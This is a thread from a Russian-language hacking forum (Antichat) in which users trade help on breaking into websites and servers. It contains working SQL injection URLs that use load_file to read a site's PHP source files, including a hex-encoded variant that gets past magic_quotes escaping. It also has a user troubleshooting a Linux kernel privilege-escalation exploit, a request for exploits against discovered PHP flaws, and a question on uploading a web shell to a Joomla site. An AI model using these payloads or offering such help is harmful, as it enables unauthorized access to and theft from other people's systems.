Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.05.2010, 18:07
|
|
Новичок
Регистрация: 27.03.2009
Сообщений: 11
Провел на форуме:
39049
Репутация:
1
|
|
http://test.ru/browse_classifieds.php?s=classified_date%20DESC&v= 0&classifiedcat_id=-1+union+select+load_file('/var/www/test/htdocs/browse_classifieds.php'),2,3%20/*
Подправьте пожалуйста запрос для скачки /var/www/test/htdocs/browse_classifieds.php
данного файла
|
|
|
09.05.2010, 18:19
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от wildshaman
Да, выслал в ПМ
Thanks!
|
|
|
|
09.05.2010, 18:25
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
http://test.ru/browse_classifieds.php?s=classified_date%20DESC&v= 0&classifiedcat_id=-1+union+select+load_file('/var/www/test/htdocs/browse_classifieds.php'),2,3%20/* Подправьте пожалуйста запрос для скачки /var/www/test/htdocs/browse_classifieds.php данного файла
вы имеете в виду magic_quotes_gpc=on
тогда
http://test.ru/browse_classifieds.php?s=classified_date%20DESC&v= 0&classifiedcat_id=-1+union+select+load_file(0x2f7661722f7777772f74657 3742f6874646f63732f62726f7773655f636c6173736966696 564732e706870),2,3%20/*
|
|
|
|
09.05.2010, 19:15
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
есть сервер Linux 2.6.18-028stab057.4 #1 SMP Fri Aug 1 10:47:59 MSD 2008 i686 GNU/Linux
при запуске эксплойта http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz пишется ошибка:
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Socket type not supported
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
ядро пропатчено?! |
|
|
|
09.05.2010, 19:45
|
|
Новичок
Регистрация: 27.03.2009
Сообщений: 11
Провел на форуме:
39049
Репутация:
1
|
|
Сообщение от pinch
вы имеете в виду magic_quotes_gpc=on
тогда
http://test.ru/browse_classifieds.php?s=classified_date%20DESC&v= 0&classifiedcat_id=-1+union+select+load_file(0x2f7661722f7777772f74657 3742f6874646f63732f62726f7773655f636c6173736966696 564732e706870),2,3%20/*
мм, можно поподробней причем magic_quotes и почему меняются буквы на код?
|
|
|
|
09.05.2010, 19:54
|
|
Новичок
Регистрация: 20.01.2010
Сообщений: 4
Провел на форуме:
19629
Репутация:
0
|
|
Сообщение от karencho777
нашел уязвимость "вставление пхп кода":PHP не ограничивает набор символов в идентификаторе сессии (PHPSESSID) в обработчиках сессии, разработанных сторонними производителями, что может облегчить злоумышленникам, действующим удаленно, эксплуатацию других уязвимостей, если они внедрят PHP-код в PHPSESSID, который хранится в файле сессии. Замечание: существует мнение, что данная проблема не является уязвимостью в самом PHP, а является скорее конструктивным ограничением, которое позволяет проводить определенные атаки против обработчиков сессии, которые не учитывают данное ограничение .
как можно етим воспользоватса?
еше насканил "пеереполнение буфера":Переполнение буфера в функции snmpget в расширении snmp в PHP позволяет злоумышленникам выполнить произвольный код, используя длинное значение в третьем аргументе (object id). так же уязвимость форматной строки и повышение привилегий все ето на 80 порту сайта помогите пожалуйсто наитй експлойт или что то т.п спасибо
не забывайте про меня пожалуйсто
|
|
|
|
09.05.2010, 19:55
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от Rabben
мм, можно поподробней причем magic_quotes и почему меняются буквы на код?
magic_quotes экранирует спецсимволы (',",null,/), в данном случае одиночные кавычки, чтобы читать файлы конструкцией load_file необходимо их наличие, для обхода экранизации используеться Sql Hex
Последний раз редактировалось Redwood; 11.05.2010 в 22:17..
|
|
|
|
09.05.2010, 21:14
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от Rabben
мм, можно поподробней причем magic_quotes и почему меняются буквы на код?
http://ru.php.net/get_magic_quotes_gpc
/var/www/test/htdocs/browse_classifieds.php
=>
0x2f7661722f7777772f746573742f6874646f63732f62726f 7773655f636c6173736966696564732e706870
=>
union+select+load_file(0x2f7661722f7777772f7465737 42f6874646f63732f62726f7773655f636c617373696669656 4732e706870)
при соответствующих правах
|
|
|
|
09.05.2010, 21:34
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
Провел на форуме:
208349
Репутация:
82
|
|
magic_quotes экранирует кавычки, чтобы читать файлы конструкцией load_file наличие их обязательно
кавычки не обязательны
для обхода этой фильтрации
это не фильтрация
используеться Sql Hex кодировка
это не кодировка
|
|
|
|
09.05.2010, 21:53
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Добрый вечер всем.cms джумла, папка на запись только images, joomla_xplorer не установить как и другой модуль, шаблоны не правятся, в пaпке с картинками залитый шелл выдается иcxодным кодом.... как залить шелл?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.gif){kind=avatar}
Похожие темы
Линейный вид
